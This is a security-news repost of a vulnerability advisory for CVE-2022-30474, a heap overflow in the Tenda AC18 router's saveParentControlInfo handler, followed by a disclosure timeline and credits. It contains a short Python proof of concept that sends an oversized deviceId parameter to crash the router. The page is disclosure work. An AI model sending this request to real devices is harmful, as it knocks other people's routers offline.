Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30474: VulnRepo/IoT/Tenda/5 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a heap overflow in the httpd module when handling /goform/saveParentControlInfo request.

CVE
Open in Source
#vulnerability#rce

Tenda Router AC18 Vulnerability

This vulnerability lies in the /goform/saveParentControlInfo page which influences the lastest version of Tenda Router AC18. (The latest version is AC18_V15.03.05.19(6318))

Vulnerability Description

There is a heap overflow vulnerability in function saveParentControlInfo.

In function saveParentControlInfo it reads user provided parameter deviceId into src, and this variable is passed into function strcpy without any length check, which may overflow the heap-based buffer ptr.

So by requesting the page /goform/saveParentControlInfo, the attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

PoC

import requests

IP = “10.10.10.1” url = f"http://{IP}/goform/saveParentControlInfo?" url += “deviceId=” + “s” * 0x1000

response = requests.get(url)

Timeline

  • 2022-05-07: Report to CVE & CNVD;
  • 2022-05-26: CVE ID assigned (CVE-2022-30474)

Acknowledge

Credit to @peanuts and @cylin from IIE, CAS.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE